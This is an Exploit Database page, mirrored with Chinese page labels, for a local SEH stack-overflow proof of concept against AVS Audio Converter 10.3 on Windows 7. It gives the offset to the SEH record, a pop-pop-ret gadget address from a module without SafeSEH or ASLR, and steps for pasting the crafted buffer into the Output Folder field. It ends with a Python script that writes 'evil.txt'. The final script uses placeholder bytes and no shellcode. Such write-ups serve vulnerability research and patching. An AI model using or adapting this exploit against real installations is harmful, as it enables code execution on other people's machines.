AVS Audio Converter 10.3 – Stack Overflow (SEH)

• Exploit Database
• 33 阅读

• 作者： Yehia Elghaly
  日期： 2023-03-27
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/51090/

• # Exploit Title: AVS Audio Converter 10.3 - Stack Overflow (SEH)
  # Discovered by: Yehia Elghaly - Mrvar0x
  # Discovered Date: 2022-10-16
  # Tested Version: 10.3.1.633
  # Tested on OS: Windows 7 Professional x86
  
  #pop+ret Address=005154E6
  #Message=0x005154e6 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [AVSAudioConverter.exe] 
  #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v10.3.1.633 (C:\Program Files\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe)
  
  # The only module that has SafeSEH disabled.
  # Base | Top| Rebase | SafeSEH | ASLR| NXCompat | OS Dll | 
  # 0x00400000 | 0x01003000 | False| False | False |False | False|
  
  #Allocating 4-bytes for nSEH which should be placed directly before SEH which also takes up 4-bytes.
  
  #Buffer= '\x41'* 260
  #nSEH= '\x42'*4
  #SEH = '\x43'*4
  #ESI = 'D*44' # ESI Overwrite 
  
  #buffer = "A"*260 + [nSEH] + [SEH] + "D"*44
  #buffer = "A"*260 + "B"*4 + "\xE6\x54\x51\x05" + "D"*44
  
  
  # Rexploit:
  # Generate the 'evil.txt' payload using python 2.7.x on Linux.
  # Open the file 'evil.txt' Copy.
  # Paste at'Output Folder and click 'Browse'.
  
  #!/usr/bin/python -w
  
  filename="evil.txt"
   
  buffer = "A"*260 + "B"*4 + "C"*4 + "D"*44
  
  textfile = open(filename , 'w')
  textfile.write(buffer)
  textfile.close()